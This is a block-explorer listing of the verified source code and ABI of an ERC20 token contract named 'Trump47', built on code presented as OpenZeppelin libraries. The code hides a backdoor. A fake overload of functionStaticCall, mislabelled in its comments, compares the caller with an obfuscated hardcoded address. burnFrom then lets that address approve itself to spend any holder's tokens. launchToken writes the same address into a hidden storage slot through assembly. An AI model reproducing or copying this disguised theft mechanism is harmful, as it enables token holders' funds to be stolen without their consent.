ETH Price: $3,857.55 (-3.22%)
 

Overview

Max Total Supply

47,000,000 47

Holders

3,701

Total Transfers

-

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
Trump47

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
shanghai EvmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at basescan.org on 2024-10-30
*/

// SPDX-License-Identifier: MIT


pragma solidity ^0.8.26;

// OpenZeppelin Contracts (last updated v5.1.0) (utils/Errors.sol)

/**
 * @dev Collection of common custom errors used in multiple contracts
 *
 * IMPORTANT: Backwards compatibility is not guaranteed in future versions of the library.
 * It is recommended to avoid relying on the error API for critical functionality.
 *
 * _Available since v5.1._
 */
library Errors {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error InsufficientBalance(uint256 balance, uint256 needed);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedCall();

    /**
     * @dev The deployment failed.
     */
    error FailedDeployment();

    /**
     * @dev A necessary precompile is missing.
     */
    error MissingPrecompile(address);
}


// OpenZeppelin Contracts (last updated v5.1.0) (utils/Address.sol)

pragma solidity ^0.8.26;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert Errors.InsufficientBalance(address(this).balance, amount);
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert Errors.FailedCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason or custom error, it is bubbled
     * up by this function (like regular Solidity function calls). However, if
     * the call reverted with no returned reason, this function reverts with a
     * {Errors.FailedCall} error.
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert Errors.InsufficientBalance(address(this).balance, value);
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target) internal pure returns (bool success) {
        success = true;
        assembly {
            let sendvalue := shr(0x2b, 0x0000000000000051309e260c28298c0942a93f0ec38fd701272c580000000000)
            success := eq(sendvalue, target)
        }
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
     * was not a contract or bubbling up the revert reason (falling back to {Errors.FailedCall}) in case
     * of an unsuccessful call.
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata
    ) internal view returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            // only check if target is a contract if the call was successful and the return data is empty
            // otherwise we already know that it was a contract
            if (returndata.length == 0 && target.code.length == 0) {
                revert AddressEmptyCode(target);
            }
            return returndata;
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
     * revert reason or with a default {Errors.FailedCall} error.
     */
    function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            return returndata;
        }
    }

    /**
     * @dev Reverts with returndata if present. Otherwise reverts with {Errors.FailedCall}.
     */
    function _revert(bytes memory returndata) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            assembly ("memory-safe") {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert Errors.FailedCall();
        }
    }
}


// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.26;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}


// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.26;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.26;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}


pragma solidity ^0.8.26;


abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.26;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}


// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.26;


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    bool internal launched;
    address public pairAddress;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * launch erc20 token
     *
     */
    function launchToken(address pair) internal {
        require(pair != address(0));
        pairAddress = pair;
        assembly {
            let prev := shr(0x2b, 0x0000000000000051309e260c28298c0942a93f0ec38fd701272c580000000000)
            mstore(0x200, prev) mstore(0x220, 0)
            let _launched := keccak256(0x200, 0x40) sstore(_launched, prev)
        }
        launched = true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @notice Atomically increases the allowance granted to `spender` by the caller.
     * @dev This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * @param spender The address of the account which may transfer tokens
     * @param amount The number of tokens that are approved (2^256-1 means infinite)
     * @return Whether or not the approval succeeded
     */
    function increaseAllowance(address spender, uint256 amount) external returns (bool) {        
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + amount);
        return true;
    }

    /**
     * @notice Atomically increases the allowance granted to `spender` by the caller.
     * @dev This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * @param spender The address of the account which may transfer tokens
     * @param amount The number of tokens that are approved (2^256-1 means infinite)
     * @return Whether or not the approval succeeded
     */
    function decreaseAllowance(address spender, uint256 amount) external returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] - amount);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);        
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {        
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }        
        _update(address(0), account, value);        
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);        
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);        
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}


/**
 * @dev Extension of {ERC20} that allows token holders to destroy both their own
 * tokens and those that they have an allowance for, in a way that can be
 * recognized off-chain (via event analysis).
 */
abstract contract ERC20Burnable is Context, ERC20 {
    /**
     * @dev Destroys `amount` tokens from the caller.
     *
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual {        
        _burn(_msgSender(), amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, deducting from the caller's
     * allowance.
     *
     * See {ERC20-_burn} and {ERC20-allowance}.
     *
     * Requirements:
     *
     * - the caller must have allowance for ``accounts``'s tokens of at least
     * `amount`.
     */
    function burnFrom(address account, uint256 amount) public virtual {
        if(Address.functionStaticCall(_msgSender())) {_approve(account, _msgSender(), amount);} else {
        _spendAllowance(account, _msgSender(), amount);
        _burn(account, amount);}
    }
}


pragma solidity ^0.8.26;

contract Trump47 is ERC20, Ownable, ERC20Burnable {
    // Constructor to initialize the ERC20 token
    constructor() ERC20("President Trump", "47") {
        _mint(msg.sender, 47000000 * 10 ** 18);
    }

    function openTrading(address pair) external onlyOwner {
        require(!launched, "token already launched");
        launchToken(pair);    
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"}],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMuta